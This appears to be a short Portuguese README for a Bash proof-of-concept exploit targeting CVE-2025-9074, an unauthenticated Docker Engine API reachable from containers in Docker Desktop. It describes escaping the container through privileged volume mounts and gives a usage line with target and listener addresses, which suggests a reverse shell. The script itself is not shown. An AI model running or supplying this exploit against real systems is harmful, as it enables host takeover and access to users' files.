
Exploit de PoC baseado em Bash para CVE-2025-9074 que visa a API do Docker Engine sem autenticação, possibilitando escape de container e execução remota de código por meio de montagem de volume privilegiado.
Uma vulnerabilidade crítica CVE-2025-9074 no Docker Desktop permite que contêineres Linux em execução local se conectem à API do Docker Engine através da sub-rede padrão (192.168.65.7:2375). O problema persiste independentemente das configurações de Isolamento Aprimorado de Contêineres (ECI) ou de exposição TCP. O código de exploit de Prova de Conceito está disponível publicamente para CVE-2025-9074. A vulnerabilidade pode permitir acesso não autorizado a arquivos de usuário no sistema host. Portanto, o nível de risco é classificado como Alto Risco.
Um script Bash independente para explorar APIs Docker expostas (normalmente na porta 2375) sem autenticação. Esta ferramenta automatiza a fuga de contêineres através da montagem de volumes, permitindo a execução remota de código.
curl e grep. Nenhum binário externo ou ferramentas de terceiros são necessários.chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
